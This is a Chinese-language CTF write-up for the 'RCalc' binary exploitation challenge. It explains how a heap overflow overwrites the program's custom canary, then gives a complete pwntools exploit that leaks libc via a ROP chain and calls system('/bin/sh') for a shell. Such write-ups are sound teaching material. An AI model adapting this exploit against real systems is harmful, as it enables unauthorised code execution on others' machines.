需要知识:ROP,堆溢出
发现查询没开PIE和canary。
程序在最开始申请了几个堆空间,并不允许我们自己申请,而且整个程序并没有free的地方,所以常规的堆漏洞并不容易利用,这时候我们就继续往下看。
这里可以看到,主要功能函数处有一个没有输入限制的字符串,由此我们就联想到使用常规的ROP。
但是程序在主要功能函数中添加了随机数植入,构造了一个自定义的canary,我们只要覆盖了这个随机数我们的程序退出时就会报错。
canary取值
不同就会报错
这样我们利用ROP也就变的不是非常简单了,我们就需要泄露这个值或者覆盖这个值看看。
我们发现这个值存在我们存储数据的堆中,而我们的堆添加数据好像并没有限制:
这样我们就可以覆盖程序的自定义canary了,这里我们动态调试一下。
我们找到了我存储数据的地址,并且也找到了程序的自定义canary存储的地址,算一下距离:
相差272 bytes,我们存储数据的方式是8 bytes一存,所以算偏移要除以八,272 / 8 = 34 = 0x22
所以我们只需要构造0x22次保存数据记录就可以覆盖自定义canary为我们想要的值了。
exp:
#! /usr/bin/env python
from pwn import *
local = 1
if local:
p = process('./RCalc')
else:
p = remote('111.198.29.45',*****)
debug = 1
if debug:
context.log_level = 'debug'
elf = ELF('./RCalc')
libc = ELF('./libc.so.6')
prdi = 0x0000000000401123
main = 0x401036
def setcanary():
for i in range(34):
p.sendlineafter('Your choice:', '1')
p.sendlineafter('input 2 integer: ', '0')
p.sendline('1')
p.sendlineafter('Save the result? ', 'yes')
p.sendlineafter('Your choice:', '1')
p.sendlineafter('input 2 integer: ', '0')
p.sendline('0')
p.sendlineafter('Save the result? ', 'yes')
printf_plt = elf.symbols['printf']
libc_s_m_got = elf.got['__libc_start_main']
canary = 0
p.recvuntil('Input your name pls: ')
payload = 'a' * 0x108 + p64(canary) + 'a' * 0x8 + p64(prdi) + p64(libc_s_m_got) + p64(printf_plt) + p64(main)
p.sendline(payload)
setcanary()
#gdb.attach(p)
#pause()
p.sendlineafter('Your choice:', '5')
libc_s_m_addr = u64(p.recv(6).ljust(8,'\x00'))
print hex(libc_s_m_addr)
offset = libc_s_m_addr - libc.symbols['__libc_start_main']
system_addr = libc.symbols['system'] + offset
bin_sh = libc.search('/bin/sh').next() + offset
payload = 'a' * 0x108 + p64(canary) + 'a' * 0x8 + p64(prdi) + p64(bin_sh) + p64(system_addr) + p64(main)
p.sendlineafter('Input your name pls: ', payload)
setcanary()
p.sendlineafter('Your choice:', '5')
p.interactive()